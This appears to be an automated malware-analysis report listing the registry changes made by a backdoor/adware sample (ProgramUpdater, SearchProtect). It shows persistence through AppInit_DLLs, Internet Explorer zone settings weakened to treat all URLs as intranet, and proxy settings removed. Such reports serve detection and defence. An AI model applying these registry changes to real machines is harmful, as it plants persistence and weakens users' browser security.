[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"65114b36" = "Vl/l////"
[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"Install_Dir" = "%Program Files%\\ProgramUpdater"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"3c09c42b" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"bbf88800" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"data.0" = "EhAzvh69FPBF1QQIKEjFslfY7xq75BgUTdENBz6WBESt9QV5qGgSD3aWu9scPyVfS42NVZxh9/XZ"
"data.1" = "TQIce3jgQ9cnvcdefAVs2 yFbmPebjlTQbyxYAVXHkfV3t2SIFS7gu2beWuShY3y1X4jBDu77eFg9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"uuid" = "3c84ccde-8cba38c6-a8a67a25"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}]
"6a096ac0" = "%Program Files%\ProgramUpdater\Assistant.dll"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"uuid" = "3c84ccde-8cba38c6-a8a67a25"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\PROGRA~1\ASSIST~1.DLL,_uninstall /un /uq"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c24899a6" = "MP/f/CF/Mx/l/C/////%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"Mode" = "4026531840"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"Version" = "22021985"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"dlpath" = "c:\progra~1\progra~1\assist~1.dll"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"0c230bcb" = "///%"
"7367429f" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c24899a6" = "MP/f/CF/Mx/l/C/////%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"Publisher" = "Certified Publisher"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\PROGRA~1\ASSIST~1.DLL,_uninstall /un"
"DisplayName" = "ProgramUpdater 1.80"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs" = "c:\progra~1\searchprotect\searchprotect\bin\spvc32loader.dll c:\progra~1\progra~1\assist~1.dll"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"svi" = "0"
"svpath" = "c:\progra~1\progra~1\AssistantSvc.dll"
"svn" = "ProgramUpdater"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"svx" = ""
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"493c7345" = ""
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"usr.0" = "SDlOIyTVNPRJLFHwys"
"usr.1" = "OoAzvzVNPRJLFHwysu"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"svt" = "1406946132"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 1F B8 5B 36 4A 20 5F 06 0C BD 69 70 B6 95 50"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"State" = "0"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"LRTS" = "0"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"LRTS" = "0"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"date" = "1406946131"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"f0bf0bde" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"0c230bcb" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"65114b36" = "Vl/l////"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"CategoryName" = ""
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"340d3099" = "///%"
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}]
"n" = "1"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"414bc593" = "///%"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"2d71d5ab" = "V/////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"
"51d2f2ea" = "J/Af/X6/GlAf/XD/aPAK/Y//G/Ay/YP/GPAf/B//VP/j/Cx/V/////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"data.1" = "TQIce3jgQ9cnvcdefAVs2 yFbmPebjlTQbyxYAVXHkfV3t2SIFS7gu2beWuShY3y1X4jBDu77eFg9"
"data.0" = "EhAzvh69FPBF1QQIKEjFslfY7xq75BgUTdENBz6WBESt9QV5qGgSD3aWu9scPyVfS42NVZxh9/XZ"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c5705860" = "Vx////%%"
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
"414bc593" = "///%"
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"iiid" = "1"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"Mode" = "4026531840"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"a0743acc" = "N/////%%"
"a2e3b941" = "///%"
"0e93c3f3" = "///%"
"51d2f2ea" = "J/Af/X6/GlAf/XD/aPAK/Y//G/Ay/YP/GPAf/B//VP/j/Cx/V/////%%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"a2e3b941" = "///%"
"a0743acc" = "N/////%%"
"7f69fa1f" = "///%"
"fe94ce1e" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"NoRepair" = "1"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"587b5709" = "V/////%%"
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"8b9e4cbc" = "V/////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"fe94ce1e" = "V/////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"493c7345" = ""
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"7f69fa1f" = "///%"
"e46c271e" = "///%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"72758a5d" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"3c09c42b" = "///%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c5705860" = "Vx////%%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"usr.1" = "OoAzvzVNPRJLFHwysu"
"usr.0" = "SDlOIyTVNPRJLFHwys"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"iiid" = "1"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"bbf88800" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"6185d035" = "VP/h/CP/V//l////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"date" = "1406946131"
The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots, which do not refer to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sp-downloader.exe:1716 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoC1.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskC5.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsqB9.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB4.tmp\,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 2A E2 A9 81 84 36 BD 7B 42 E1 78 3D 42 64 38"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots, which do not refer to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process CltMngSvc.exe:1784 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB CD 84 90 AB DA D3 E6 6F 05 ED 27 A4 02 3E E1"
The process CltMngSvc.exe:1640 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 E0 2D 82 B3 B2 7D 21 1F F6 1C 23 7A AF 28 6C"
The process nsoBA.tmp:2012 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\SearchProtect]
"SPID" = "SP02A809A1-AD66-49FC-9E31-72DC6687025A"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs" = "C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect]
"Publisher" = "Client Connect LTD"
[HKLM\SOFTWARE\SearchProtect]
"Environment" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect]
"UninstallString" = "C:\PROGRA~1\SearchProtect\Main\bin\uninstall.exe /S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect]
"DisplayVersion" = "2.16.10.61"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\SearchProtect]
"InstallDir" = "C:\PROGRA~1\SearchProtect"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect]
"DisplayIcon" = "C:\PROGRA~1\SearchProtect\SearchProtect\bin\cltmng.exe"
"DisplayName" = "Search Protect"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 DA 6C A1 E0 05 3D D3 D8 D5 21 6B 59 96 9D 16"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
